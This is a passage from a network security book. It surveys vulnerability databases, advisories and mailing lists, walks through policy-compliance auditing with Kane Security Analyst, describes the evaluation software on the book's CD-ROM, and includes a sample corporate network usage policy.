from the same page. Finally, recent patches can all be viewed from a single \npage, so you can quickly find the latest upgrades. \nSun Microsystems \nSun manufactures one of the most popular lines of UNIX operating systems. These boxes have found homes as \nengineering workstations and high-end application servers. Sun is known for pushing the performance envelope \nwith its UltraSPARC product line, which is already using 64-bit processors running at speeds of 900MHz. \nTechnical Information \nSun has made a tremendous improvement to its support infrastructure, and most patches and support information \ncan be found (for free) on their Web site, www.sun.com. This is in sharp contrast to several years ago when \neven patches had to be purchased. \nNote \nSun also actively participates in CERT advisories and has posted a number of vendor \nbulletins. \nSun also maintains a section of its Web site for updating clients on security-related information. This page can be \naccessed through the link http://sunsolve.sun.com/pub-\ncgi/show.pl?target=security/sec. \n \nThird-Party Channels \nThere are a number of third-party resources you can use in order to stay informed of the latest security-related \nexploits. Typically, these resources are established by helpful netizens or organizations that specialize in network \nsecurity. All of the resources listed here are free, meaning that there is no entry fee required in order to access \nsecurity-related information. Some resources do post advertisements, however, in order to defray the cost of \nmaintaining the resource. \nThird-party security resources include vulnerability databases, Web sites, mailing lists, and newsgroups. Each has \nits own drawbacks and benefits: \nVulnerability database Provides search capability for finding exploits but no feedback if you have \nadditional questions \nWeb site May have direct links to patch information, as well as a more detailed description, but \nyou will have a harder time finding a specific exploit \nMailing list Provides immediate notification of exploits as they are found, but some lists can bury \nyour mailbox with 50+ messages a day \nNewsgroup Offers more detailed discussions regarding specific exploits, but you may have to sift \nthrough lots of messages to find the information you are looking for \nTip \nGenerally, it is best to subscribe to only one or two mailing lists in order to be informed of \nexploits as they are found. You can then use the vulnerability databases and Web sites when \nyou wish to research a specific issue. \nVulnerability Databases \nVulnerability databases allow you to search for an exploit based on specific criteria. For example, you may be able \nto search for exploits that affect a specific operating system (NT, Linux, and so on), meet a specific attack \n" }, { "page_number": 357, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 357\nsignature (denial of service, cracking, and so on), or even exploits that have been discovered over a specific range \nof dates. \nISS’s X-Force Database \nInternet Security System’s X-Force database can be searched by platform or by keyword. There are seven different \nflavors of UNIX to choose from, depending on your taste, as well as all Windows operating systems, which are \ngrouped into a single category. The database only lists operating system exploits; there are no entries for \nnetworking hardware such as 3COM or Cisco devices. You can choose to display a month’s worth of exploits or \nall entries for a specific platform. You can also select to have hits displayed with a short summary or all on one \npage. \nA unique feature of the X-Force database is that each entry is assigned a level of risk. If your query produces \nmultiple entries, you can quickly scan through the list in order to find the worst of the bunch. The database entries \nare sufficiently descriptive, although not always 100 percent accurate. For example, if you look up the Exchange \nexploit, which we discussed in the last chapter, the record states: \nThis action will cause the Exchange Server to crash. This attack does not result in loss of data or \nunauthorized access to data held in Exchange Server. The Exchange Server could also be vulnerable \nto stack overwriting attempts by allowing an attacker to insert code as part of the address and have \nit executed. \nAs you can see, there are some inconsistencies in this entry. If the exploit causes the server to crash, at a minimum \nyou are going to lose any data that is still in RAM and has not yet been written to disk. Also, this record \ncontradicts itself by first stating that this exploit cannot be used for unauthorized access, but then goes on to say \nthat it could be used to execute code. \nThe X-Force database can be found at this URL, http://xforce.iss.net. \nPacket Storm \nPacket Storm bills itself as “the largest and most updated library of information security information in the world.” \nIt is indeed one of the most comprehensive search and reporting engines on all aspects of information security, and \ncovers not just the weaknesses of a given system but also provides a news service covering the latest happenings \nin the information security realm. \nPacket Storm provides a unique feature called Storm Watch, which reports on the topics searched most often on \ntheir database. A printout of the top 20 searches is shown in Table 17.1. \nPacket storm can be found at the URL, http://packetstorm.securify.com/. \nTable 17.1: Top 20 Requested Areas of Security Interest \nQuery \nDate \napache \nSun Feb 18 10:52:22 PST 2001 \nnamed \nSun Feb 18 10:52:20 PST 2001 \nfirewall software \nwindows \nSun Feb 18 10:52:18 PST 2001 \nlinux 2.0.35 \nSun Feb 18 10:52:18 PST 2001 \nssi exec \nSun Feb 18 10:52:15 PST 2001 \npimp.c \nSun Feb 18 10:52:13 PST 2001 \nunix keylogger \nSun Feb 18 10:52:05 PST 2001 \nepmap \nSun Feb 18 10:52:04 PST 2001 \nproftpd 1.2.0pre2 \nSun Feb 18 10:52:03 PST 2001 \nexec cmd \nSun Feb 18 10:52:01 PST 2001 \nNT 4.0 \nSun Feb 18 10:51:49 PST 2001 \napache exploit \nSun Feb 18 10:51:48 PST 2001 \n" }, { "page_number": 358, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 358\nTable 17.1: Top 20 Requested Areas of Security Interest \nQuery \nDate \nroot shell \nSun Feb 18 10:51:28 PST 2001 \nmail \nSun Feb 18 10:51:25 PST 2001 \nuin sniffer \nSun Feb 18 10:51:24 PST 2001 \nwindows 98 \nSun Feb 18 10:51:23 PST 2001 \nphp \nSun Feb 18 10:51:12 PST 2001 \n+apache +exploit \nSun Feb 18 10:51:10 PST 2001 \nsolaris \nSun Feb 18 10:51:08 PST 2001 \nwindows 98 \nSun Feb 18 10:51:08 PST 2001 \nSecurity Bugware \nMore of a listing than a true database, the Security Bugware site probably contains the most complete listing of \nexploits and vulnerabilities of any site on the Internet. The amount of information is staggering. The Windows \nsection alone contains more than 250 entries. Some of these are somewhat repetitive. For example, there are five \nentries for Ping, but three of these are different implementations of the Ping of death. This repetition is actually a \ngood thing, because it gives you a more complete picture of how a vulnerability can be exploited. \nThere is no search capability for the entries. You must select one of 12 operating system categories and wade \nthrough the results. The entries are listed in alphabetical order, so searching the page is not too difficult. You can \nalso use the Find function within your Web browser in order to have some limited search capabilities. \nNote \nThe vulnerability listings are also complete in terms of diversity of the listed products. \nNot only are major operating systems listed; you can also find vulnerability entries for \nnetworking hardware and network applications. If you link to only a single vulnerability \ndatabase, this is the one to pick. \nThe site can be accessed through the URL http://161.53.42.3/~crv/security/bugs/list.html. \nWeb Sites \nThird-party Web sites can contain a wealth of information about all forms of security-related issues. There are \nsites that can give you pointers on securing your environment, as well as sites that provide the same tools an \nattacker would use against your network. There are obviously too many security-related sites to list them all here, \nso I have chosen a few of my favorites. \nAntiOnline \nAntiOnline is one of those sites with a little bit of everything. The main page has a listing of current news events \nthat pertain to network security. There is also a “Quick Tips” section, which provides some excellent hints on \ndealing with some of the day-to-day security issues a network administrator faces, such as tracking spoofed \naddresses or dealing with spam. Another link brings you to an online library with papers on a wide range of \nsecurity topics. There is even a file archive containing a large number of security tools, both positive and negative \nin functionality. You can access Antionline at www.antionline.com/. \nThe CERT Home Page \nThe Computer Emergency Response Team (CERT) maintains the site responsible for collecting Internet-based \nexploits and works with vendors to get vulnerabilities resolved. CERT also issues public bulletins on known \nvulnerabilities. \nNote \nWhile CERT primarily focuses on UNIX vulnerabilities, it does issue Windows bulletins, \nas well. \nThe site also contains helpful pointers for securing your environment. The URL for CERT is www.cert.org/. \nGuide to (Mostly) Harmless Hacking \nDespite its name, this is actually a very useful (although a little dated) site if you are looking to protect yourself \nagainst attack. While there are many examples of how to launch attacks, there are just as many that discuss how to \n" }, { "page_number": 359, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 359\nprevent them. There are even some helpful tips on writing shell scripts and batch files. All examples assume that \nthe reader has very little computer experience, making the tutorials easy to follow. The guide can be found at \nwww.spaziopiu.it/elettrici/gtmhh/. \nL0pht and @stake \nL0pht started out as a group of hackers working out of the Boston area who specialized in system security and \ncryptography. Their site was a wealth of security-related information, including advisories and tools. Some of the \nbest-known vulnerabilities were discovered in L0pht’s test lab. This means that most of L0pht’s advisories are \nbased on firsthand information. \nIn January of 2000, L0pht joined a newly formed company called @stake (created by former executives of \nCompaq, Forrester Research, and Cambridge Technology Partners). Because the former members of L0pht now \nrun the research lab at @stake, the Web site continues to be one of the best sources of security advisories. Many of \nthe tools pioneered by L0pht (like L0phtcrack and Antisniff) are now distributed by Security Software \nTechnologies and can be found at www.securitysoftwaretech.com/. \nNewer tools developed by the research lab are still hosted to the local Web site. The entire research lab can be \nfound at www.atstake.com/research/index.html. \nThe National Security Institute \nThe National Security Institute (NSI) home page goes beyond the network and publishes security-related \ninformation on a variety of topics. Along with computer security, the site covers personal security, terrorism, \nsecurity legislation, and even travel advisories. The information on the site is extremely diverse. You can even \nread papers on the psychological effects of implementing an information security policy. This site is an excellent \nresource if you are looking to expand your knowledge of the security field. The NSI home page can be accessed at \nhttp://nsi.org/. \nPhrack Magazine Home Page \nPhrack magazine is one of the longest-running electronic periodicals dealing with system vulnerabilities. Quite a \nfew exploits have been made known to the public through the pages of Phrack. While most of the articles are \nwritten from the perspective of how to perform an exploit, the articles do an excellent job of describing all the \ngory details of why an exploit is effective. This is just the information you need in order to insure that you do not \nfall prey to attack. Phrack is not published on any set schedule. The most recent issue, #56, was released in May of \n2000. Phrack does not have its own Web site, but archives can be found at \nhttp://packetstorm.securify.com/mag/phrack/. \nRobert Malmgren’s NT Security FAQ \nAs the name implies, this site is NT specific (no Windows 2000 information), but it contains everything you \nwould ever want to know about securing an NT server. Every aspect of an NT server is covered in great detail, \nincluding account administration, the Registry, and the file system. There is even a section on NT-compatible \nfirewall and authentication options. If you need to secure an NT server, this site is well worth the visit. The NT \nSecurity FAQ can be accessed at www.it.kth.se/~rom/ntsec.html. \nMailing Lists \nMailing lists are an extremely useful tool for staying informed of security vulnerabilities. They provide you with \nimmediate notification when vulnerabilities are released to the public. They also supply a forum where the fine \npoints of a particular exploit can be discussed in detail. A mailing list can provide you with far more information \nregarding a specific exploit than a vulnerability database, because most mailing lists are interactive. If the list is an \nopen forum, you are free to ask questions. \nNote \nTo join a mailing list, you must send an e-mail message to the mailing list server. This \nmessage must include some form of keyword or words in the body of the message (not the \nsubject line) such as subscribe. To be removed from a list, you typically repeat the \nprocess using the word unsubscribe. \nBugtraq \nThe mother of all vulnerability discussion lists, Bugtraq is a moderated mailing list for the discussion of exploits. \nMany vulnerabilities are announced publicly for the first time on this list. The mailing list focuses on what exploits \nhave been found, as well as what can be done to fix them. This is the one list you can subscribe to that will \nguarantee that you hear about any exploits that are discovered. While traffic volume is a bit high, the information \ncollected through this list is well worth the price of hitting your Delete key a few extra times a day. \n" }, { "page_number": 360, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 360\nSecurity Focus hosts the Bugtraq archive and the subscription form at \nwww.securityfocus.com/about/feedback/subscribe.html. \nFirewall-Wizards \nThe Firewall-Wizards mailing list is for the discussion of all topics related to firewalls and perimeter security. The \nlist is moderated by Marcus Ranum, who helps to insure that all posts stay on topic and that all spam is filtered. \nTraffic levels tend to be fairly low, with peaks when something exciting is going on within the firewall industry. \nThe list has some extremely knowledgeable members, making it a great place to pick up firewalling tips. \nTo get more details and to join the list, go to www.nfr.com/mailman/listinfo/firewall-wizards. \nInfoSec News \nThe InfoSec News mailing list disseminates security-related news articles. These include excerpts from \nnewspapers, magazines, and online references. The mailing list is closed, meaning that only the moderator is \nallowed to post. You can, however, contribute by sending the moderator security-related news articles. The list \ndoes not discuss vulnerabilities so much as what is going on in the security field. For details on how to join the \nlist, go to www.c4i.org/isn.html. \nISS’s X-Force IDS Discussion List \nISS hosts a number of discussion lists under the X-Force branch of its Web site; one of the more popular is the \nintrusion detection system mailing list. This is an unmoderated list with a focus on any topic related to intrusion \ndetection systems. The list is an open discussion forum, meaning that anyone is free to post questions or \ncomments. To join the list, point your browser to http://xforce.iss.net/maillists/. \nThe NTBugtraq Mailing List \nThe NTBugtraq mailing list focuses solely on Microsoft Windows exploits and vulnerabilities. Despite the list’s \nname, it discusses all Microsoft operating systems and applications. The list is very heavily moderated, keeping \npostings to an absolute minimum. In fact, most of the postings originate from the list moderator or from the \nMicrosoft programming staff. If you are strictly interested in Windows, this may be a good list to join. \nNote \nWindows-related vulnerabilities that originate on the Bugtraq mailing list eventually find \ntheir way to this list, as well. \nFor more NTBugtraq information and to join the list, go to www.ntbugtraq.com. \nNewsgroups \nIf newsgroups are more your style, there are a number of groups that deal with security-related topics. Newsgroups \nare useful in that you do not have to worry about filling up your Inbox. Messages are posted to newsgroup servers, \nwhich you can review at your leisure. The only problem with newsgroups is that they tend to have a very high \nsignal-to-noise ratio. This is because newsgroup forums are unmoderated. \nNote \nA high signal-to-noise ratio means that you may have to filter through a lot of postings in \norder to find the information that interests you. \nI have listed some newsgroups that may be of interest here, but I have not included a complete description. This is \nbecause the newsgroup name is typically descriptive: \nƒ \ncomp.os.ms-windows.nt.admin.security \nƒ \ncomp.os.netware.security \nƒ \ncomp.security \nƒ \ncomp.security.firewalls \nƒ \ncomp.security.ssh \nƒ \ncomp.security.unix \nƒ \ncomp.security.misc \nƒ \nmicrosoft.public.access.security \n \nAuditing Your Environment \nThe task of securing a network environment can be daunting, especially if you have multiple servers to deal with. \nIt can be tough enough to handle the day-to-day firefighting, let alone figure out how to best lock down your \n" }, { "page_number": 361, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 361\nsystems. For the network administrator with many jobs to do, security can get put on the back burner in order to \nfree time for other activities. \nMany times the problem is not knowing what to look for. Most network administrators can change settings or load \npatches as required—but it would be nice to have some guidance about what needs to be done. The most obvious \noption is to hire a security consultant; however, this may be beyond your budget. \nIf you need to fix exploits, the vulnerability scanners covered in Chapter 16 are a good place to start. Products \nfrom Internet Security Systems (ISS) and WebTrends do an excellent job of documenting known exploits. \nSometimes, however, what you are looking for is some guidance on how to create a more secure computing \nenvironment. When this is the case, consider using a security auditing program. \nA security auditing package does not look for bugs or known vulnerabilities. Rather, it allows you to verify that all \nsystems on your network comply with your security policy. For example, if your policy states that all user \naccounts should be forced to change their passwords every 90 days, an auditing package will check each of your \nservers in order to verify that this is the case. \nKane Security Analyst \nIntrusion Detection’s Kane Security Analyst (KSA) is a server auditing package. It does not perform vulnerability \nchecks, but it will assess the security policy compliance level of each of your servers. KSA is capable of auditing \nWindows NT, NetWare (both bindery and NDS), UNIX, and even Lotus Notes servers. As part of KSA’s \nassessment, it will check user accounts, the file system, logging, and even the Registry on NT/2000 systems. You \nenter the criteria for your organization’s security policy, and KSA reports which network servers are \nnoncompliant. \nFor an example, we will take a look at KSA’s auditing ability when dealing with Windows 2000. \nNote \nThe auditing process and reports generated against Windows NT/2000 are similar to each \nof the other platforms. The only big difference with Windows NT/2000 is that KSA can \ncheck Registry permissions and verify which drives are using NTFS. \nYou can download the latest 30-day evaluation copy of KSA from www.intrusion.com. \nInstalling KSA \nThe KSA installation could not be simpler. Simply download the latest version from KSA’s Web site, run the self-\nextracting executable (pointing the contents to a temporary directory), and run the setup.exe file. After it prompts \nyou for a directory location, the Setup program will install all the required files. If you decide later to remove \nKSA, you can do so by clicking the Add/Remove Programs icon within Control Panel. \nNote \nKSA must be run from a Windows server or workstation, version 3.51 or higher. While \nthe program will successfully install on Windows 95/98, it will not run. \nYou can install the software on any NT/2000 system and audit servers remotely. You do not need to install the \nsoftware on every system. Once the software installation is complete, simply go to the Kane Security Analyst \nprogram group and click the Kane Security Analyst icon. \nUsing KSA \nThe KSA main screen is shown in Figure 17.2. In order to perform a compliance audit, you need to follow three \nsimple steps: \n1. Set a security standard. \n2. Run a security audit. \n3. Display the analysis of a security audit. \n" }, { "page_number": 362, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 362\n \nFigure 17.2: The KSA main screen \nEach of these steps is progressively numbered as a different button along the bottom of the screen. The fourth \nbutton can be used to review compliance history. Once an audit has been performed, you can quickly select to \nview a single portion of the audit using the icons at the top of the screen. This allows you to hone in on a specific \nportion of the audit. \nDefining a Security Policy \nIn order to input your security policy, click the Set Security Standard button. This produces the screen shown in \nFigure 17.3. The buttons along the left side of the screen allow you to select different aspects of your security \npolicy. For example, Account Restrictions is selected by default. This button allows you to define whether KSA \nshould check to see if station and time restrictions are being used. You can also tell KSA to check for disabled or \ndormant accounts. \n \nFigure 17.3: Setting security policy account restrictions \nAlong the top of the screen are some tabs labeled for different operating systems. Each tab allows you to select \nparameters for the applicable operating systems on your network. You must purchase additional licenses in order \nto activate these tabs. The buttons on the left and the tabs at the top allow you to navigate through all the audit \nparameters. For example, selecting System Monitoring along with the NetWare 4 tab will allow you to set which \nlogging options should be checked on all of your NetWare 4.x servers. \n" }, { "page_number": 363, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 363\nPerforming an Audit \nIn order to run an audit, select the Run Security Audit button from the KSA main screen. This will produce the \nRun Security Audit window shown in Figure 17.4. From this screen you tell KSA whether you wish to update a \nprevious audit or perform a new one from scratch. You must also select which systems or domain you would like \nto have checked during the audit. \n \nFigure 17.4: The Run Security Audit window \nThe Schedule button allows you to run the audit on a schedule. This is useful if you would prefer to have the audit \nrun during off hours or on the weekend, but you do not want to be there in order to initiate it. \nYou can even have the scheduler run the audit on a regular basis so that you can compare different audits to see if \nany of your policy settings have changed. \nOnce you have selected the audit parameters, simply click the Start icon in the lower right portion of the screen. \nThe amount of time it takes to perform the audit will vary based on the speed of the machine performing the audit \nand how many systems you have instructed KSA to check. Once the audit is complete, you can review the results. \nReviewing the Audit Results \nYou can review a graphical summary of the audit results by selecting the Survey Risk Analysis button from the \nKSA main screen. This produces the Risk Analysis Survey window shown in Figure 17.5. As you can see, the \ngraphic does an excellent job of illustrating which portions of the system configuration meet your security policy \nguidelines and which ones do not. A score of 100 percent is full compliance. Anything less indicates that the \nsystem needs some tuning. You can use the percentage of compliance as a metric for determining where to focus \nyour attention first. \n" }, { "page_number": 364, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 364\n \nFigure 17.5: The Risk Analysis Survey window \nIf you select the System Monitoring button in the Risk Analysis Survey window, you can retrieve detailed \ninformation about why System Monitoring scored so poorly. This will produce the System Monitoring screen \nshown in Figure 17.6. DEFCON4 scored so poorly on the System Monitoring test because event logs and retention \ntime have been incorrectly configured. Since our policy stated that all servers should utilize these features, KSA \nhas flunked this system. If you look in the lower right corner of the figure, you will see that the Security Log Size \nis too small and that log entries are not being retained long enough. This information is extremely useful, because \nyou now know exactly what settings need to be modified in order to bring this system into compliance. \n \nFigure 17.6: The System Monitoring screen \nNow that we have run an audit, we can investigate some of the other KSA features. For example, clicking the \nRegistry Rights icon on the main KSA screen produces the Registry Rights window shown in Figure 17.7. From \nthis window you can browse the access rights assigned to each user or group. The left pane allows you to navigate \nthe Registry, while the right pane shows you who has been assigned access and what level of permissions has been \ngranted. The Add button allows you to flag this Registry key as a favorite. \n" }, { "page_number": 365, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 365\n \nFigure 17.7: The Registry Rights window \nIt can be extremely time-consuming to navigate the entire Registry tree in order to check permissions. Typically, \nthere are only a few Registry keys that you will want to check on a regular basis, such as the SAM key. The \nFavorite Keys tab allows you to indicate which keys you find most interesting. You can then select the Favorite \nKeys tab to view all your favorite keys in a single area. This saves you from having to search the Registry every \ntime you wish to check their permission settings. \nAnother useful icon is the Report Manager. The Report Manager allows you to create custom reports and \nselectively choose which information is reported in each. For example, you could create a single report that \nidentifies all the services running on every server, as well as error log entries. This allows you to quickly verify the \nhealth of all your network services. \nPutting the Results to Use \nOnce you have your audit, it is now time to focus on your problem areas and get them resolved. KSA is an \nexcellent tool because it does not give you a false sense of security. Systems are verified based on the security \npolicy you input into the software. This means that you are not checking your systems against some arbitrary \nstandard. You are verifying which systems are in compliance with your security policy and which ones are not. \nThis allows the tool to be molded for any networking environment. \n \nSummary \nIn this chapter we discussed how you can stay better informed of exploits as they are found. \nWe discussed what vendor and third-party resources are available for investigating \nvulnerabilities and where to find patches. We also discussed which mailing lists and \nnewsgroups are available if you need to find out more information. Finally, we looked at how \nto perform a security audit on your network and what tools are available to aid you in this task. \n \n \n \n \n \n \n" }, { "page_number": 366, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 366\nAppendix A: About the CD-ROM \nThis CD-ROM contains security software products that will enable you to identify vulnerable points \nin your network and secure your business against malicious attack. Sybex provides these products \nfor its readers through exclusive partnerships with the software companies involved. Installation \ninformation is presented below; where indicated, review the readme files that accompany each \nproduct for more information. \nNote \nYou will need Windows NT 4 to install these products on your machine. \nFireWall-1 \nIncluded on the CD is a fully functioning, 30-day evaluation copy of the industry-leading \nfirewall and security suite, FireWall-1, from Check Point Software Technologies, Ltd. FireWall-\n1 is available for the following operating systems: \nƒ Windows NT 4 \nƒ Windows 2000 \nƒ Red Hat Linux 6.1 \nƒ Sun Solaris 2.6, 7 \nƒ HP-UX 10.20, 11.0 \nƒ AIX 4.2.1, 4.3.2, 4.3.3 \nNote \nFor security reasons, you cannot install or activate your fully functioning \nevaluation copy of FireWall-1 until you have received a certification key from \nCheck Point. E-mail sales@checkpoint.com to receive this key. \nCheck Point has included complete documentation on FireWall-1, available in PDF format for \nAcrobat Reader. These user manuals are located in the FireWall-1/ Docs/Userguid \nfolder on the CD-ROM. To begin, open the gs.pdf file and read \"Getting Started with Check \nPoint FireWall-1.\" \nNote \nIf you don’t have Acrobat Reader, you can install it directly from the CD-ROM. \nThe setup files are located in the FireWall-1/Docs/Pdfread folder; choose the \nappropriate setup for your operating system. \nTo install FireWall-1 on Windows NT 4, simply double-click the setup.exe file in the FireWall-1 \nfolder on the CD and the Installshield Wizard will guide you through the installation process. \nWarning \nDo not install firewall demo products on production servers! They can restrict \nservice to the machines so that you will not be able to log in correctly or use \nthe machines for any other purpose. \n \nGuardian \nIncluded on the CD is a fully functioning, 30-day evaluation copy of the award-winning \nGuardian firewall from NetGuard, Inc. Double-click the setup.exe file in the NetGuard folder \non the CD to install the program. If you have any questions about Guardian’s installation or \noperation, you can skim through the 158-page User’s Manual that is included on the CD in \nPDF format \nWarning \nDo not install firewall demo products on production servers! They can restrict \nservice to the machines so that you will not be able to log in correctly or use \nthe machines for any other purpose. \nIf you have any questions about the installation or operation of the Guardian firewall, contact \nNetGuard, Inc. at \nNetGuard, Inc. \n2445 Midway Road \nBuilding 2 \nCarrollton, Texas 75006 \n" }, { "page_number": 367, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 367\n972-738-6900 \nsales@netguard.com \nwww.netguard.com \n \nInternet Scanner \nInternet Security Systems, Inc. (ISS) has provided an evaluation copy of Internet Scanner, its \ncomplete network security vulnerability detection system. Double-click the setup.exe file \nlocated in the ISS folder on the CD. \nNote \nFor security purposes and due to the powerful nature of ISS’ Internet Scanner, \nthe company requires that in order to fully evaluate the product, you utilize an \nencrypted license key. To obtain an extended evaluation key from Internet \nSecurity Systems (ISS), you can e-mail the company with your request at \nsales@iss.net. In the e-mail, please include your name, mailing and e-mail \naddresses, phone number, and the IP address range of your network. A license \nkey will be e-mailed to you as soon as possible. You can also contact ISS by \nphone at (888) 901-7477. \n \nNetwork Monitoring Suite (NMS) \nIncluded on the CD is a fully functioning, 30-day evaluation copy of Lanware, Inc’s Network \nMonitoring Suite (NMS). NMS is a software package designed to monitor the performance of \ncritical elements of your network including routers, hubs, Windows NT Workstations, and \nWindows NT and UNIX servers. You must fill out the form at \nwww.lanware.net/download/eval/nms_registration.asp in order to request and \nreceive a 30-day license for NMS. \nDouble-click the setup.exe file located in the Lanware folder on the CD to install the \nprogram. If you have any questions about the installation or operation of NMS, contact \nLanware, Inc. at \nLanware, Inc. \nsales@lanware.net \nwww.lanware.net \nWinZip \nWinZip Computing (formerly Nico Mak Computing, Inc.) has provided a shareware evaluation \ncopy of WinZip, its popular compression/decompression program. To install this product, \nlocate the setup.exe file in the WinZip folder on the CD and double-click it. \nNote \nYou will need WinZip to install some of the other products included on this CD. \n \nAppendix B: Sample Network Usage Policy \nWhile this appendix has been included in order to provide you with a sample network usage policy, ideally usage \npolicies are process-driven and usually go through several steps which are part of a never-ending cycle as business \nneeds and technology change. \nNote \nThe following links are two examples of actual usage policies. The first is corporate, the \nsecond is for an educational institution: \nwww.oit.gatech.edu/security/policy/usage/contents.html \nwww.dmtnet.com/Internetpolicy/policy.pdf \nPrinciples behind an Effective Network Usage Policy \nThere are two principles traditionally used to justify network usage policies: \n" }, { "page_number": 368, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 368\nTotal Cost of Ownership (TCO) \nTCO includes measuring employee productivity versus resource utilization. \nEmployee Productivity Networks exist to ease the transfer of information, thereby making \nworkers more productive. Ideally this productivity can be measured, which allows management to \ntie appropriate network usage to productivity goals. \nResource Utilization The utilization of resources within a company must be suitably justified. \nNetwork activities that do not contribute to the bottom line simply cannot be justified from a cost \nperspective. Usage policies help define which activities are a justifiable use of resources—all other \nactivities are automatically prohibited. \nRisk Mitigation \nPolicies reduce the threat of information activity by defining those network activities that unjustifiably \ncompromise company liability, threaten sensitive information, or open the organization to negative publicity: \nLiability Traditionally considered the domain of discrimination or sexual harassment, liability \nissues have expanded to include any communication that would result in the company being held \nliable. \nSensitive Information Any information that would provide an advantage to a competitor—it is \noften the subject of intense scrutiny from rivals. \nNegative Publicity Any communication or use of resources that would lead to a negative image of \nan organization, negative publicity often has a direct impact to the revenue flow of an organization \ndue to lost sales and stock revenue \n \nThe Developmental Process \nThe process of fine-tuning the for a specific organization goes through many phases: \nDiscovery This first step is ideally performed with input from all levels of an organization that \nuse the network. This not only provides a comprehensive policy, but eases employee support \nand education efforts. Typical questions are: \nƒ What company roles (or individuals) need access? \nƒ Which specific network services do they need? \nƒ What are the current methods of access (including time and location)? \nƒ Which core business applications are internet-integrated? \nƒ What constitutes sensitive data? \nƒ What are the measurable productivity goals, and how do network resources achieve \nthose goals? \nƒ What risks to network (and information) resources exist? (i.e. corporate espionage, \nliability, and negative publicity) \n" }, { "page_number": 369, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 369\nƒ What are the legal issues surrounding employee monitoring vs. privacy? \nDefinition The second step synthesizes the collected information from the first step to \ncreate the policy. Topics include the following: \nƒ Definitions of acceptable use as they fit into overall company vision/ mission, core \nbusiness process/applications, and individual/collective roles \nƒ Definitions and examples of sensitive data, processes, and resources \nƒ Risks to data including corporate espionage, liability, and negative publicity \nƒ Declaration of intent to monitor employee communication along with definition and \nexamples of appropriate private communication and employee consent procedures \nƒ Consequences of policy violation, including penalty and appeal process \nƒ Procedures for complaint and/or modification of the policy \nƒ Methods of disseminating the policy \nImplement The third step is to implement the policy. Implementation fundamentally consists \nof two steps: \nƒ Disseminate the policy and educate the employees \nƒ Enforce the policy \nReview The final step is to review the effectiveness of the policy against the two principles \nunderlying the policy, namely (and in review): Total Cost of Ownership and risk mitigation. If \nthe policy is not effective in satisfying these principles, the process is run again. \nThis sample policy that follows has been developed for Fubar Corporation. Fubar makes a \nwide range of desktop applications including FuMeeting, which is its premier meeting \nscheduler, and FuHR, which is an employee database system. There is a main office in New \nYork, as well as a small sales office located in San Diego. The sales office is connected to the \nmain office via a 128K Frame Relay connection. The corporate office also has a T1 \nconnection to the Internet. \nThere are more than 200 employees working out of the corporate office; about half of them \nare programmers. Fubar has a very modern telecommuting policy and allows each \nprogrammer to work from home one day a week. In addition, Fubar’s sales personnel spend a \nlot of time on the road doing presentations and making sales calls. Because so many \nemployees spend time working away from the office, Fubar has deployed two remote-access \nsolutions. Remote access is provided via a dial-in modem pool, as well as over the Internet \nusing special VPN software. \nThe sensitivity of the information entering the network via remote connections is considered \nmoderate. Since the programmers are working on the latest program code, Fubar could lose \nits business edge if this information were to fall into the hands of a competitor. Additionally, \nthe sales information is considered sensitive because this data could give a competitor clues \nabout new product releases. \n \nScope \nThe scope of this document is to define the company policies on proper network usage. The \ncorporate network is a substantial investment toward profitability. It exists in order to improve \nemployee productivity and to increase workflow efficiency. The components of the network are \nconsidered to be \nƒ All cabling used for carrying voice and electronic information \nƒ All devices used for controlling the flow of said voice and electronic information \nƒ All computer components including (but not limited to) monitors, cases, storage devices, \nmodems, network cards, memory chips, keyboards, mice network cards, and cables \nƒ All computer software \n" }, { "page_number": 370, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 370\nƒ All output devices including printers and fax machines \nDisciplinary action for failure to comply with any of the policy guidelines described in this \ndocument will be rendered on a per-incident basis. The company reserves the right to seek \nlegal action when local, state, or federal laws have been broken or when financial loss has \nbeen incurred. \n \nNetwork Management \nAll network maintenance, including configuration changes to desktop systems, are to be made \nsolely by the operations staff. Employees or contractors who are not members of the \noperations staff are not allowed to make system modifications, even to the workstations \nissued to them by the company. Any of the following activities would be considered a \nmodification to the system: \nƒ Patching a system’s network drop to a new location \nƒ Using a system’s floppy drive to boot an alternative operating system \nƒ Removing a system’s case or cover \nƒ Installing any software package, including software downloaded from the Internet \nHardware management is restricted in order to insure that warranties are not inadvertently \nvoided and that security precautions are not circumvented. Software installation is restricted in \norder to insure that the company remains in compliance with software licensing laws. It also \ninsures that proper support for the software can be provided by the internal operations staff \nand that software incompatibilities are avoided. \n \nPassword Requirements \nEach employee will be issued a unique logon name in order to gain access to network \nresources. Every logon name will also have an associated password. The password provides \nverification that only the authorized user may access network resources using this unique \nlogon name. It is the responsibility of every employee to insure that his or her password \nremains secret. Passwords are to be used under the following guidelines: \nƒ Passwords are to be a minimum of six alphanumeric characters. \nƒ Passwords cannot consist of common words or variations on the employee’s name, logon \nname, server name, or company name. \nƒ The employee will be required to change his or her password every 60 days. If the \nemployee does not do so, his or her account will be disabled. In order to reactivate a \ndisabled account, the employee must have his or her direct supervisor contact the \nnetwork operations staff. \nƒ During authentication, the employee will have three attempts at entering his or her \npassword correctly. If all three attempts fail, the account will be disabled. In order to \nreactivate the account, the employee must have his or her direct supervisor contact the \nnetwork operations staff. \nƒ Every company computer is required to use a screen saver that activates after 15 minutes \nof inactivity. Once the screen saver becomes active, it should require that the user again \nauthenticate with the system before gaining access. \nƒ For accessing the network remotely, either through the dial-in modem pool or through an \nInternet-based Virtual Private Network (VPN), the employee will be issued a security \ntoken which will produce a new password every 60 seconds. The password generated by \nthe security token is to be used when the employee is accessing the network remotely. \n" }, { "page_number": 371, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 371\nƒ Passwords are to be kept private. The employee is expected to not write down his or her \npassword or share it with other individuals. The exception is that an employee will \nsurrender his or her password if requested to 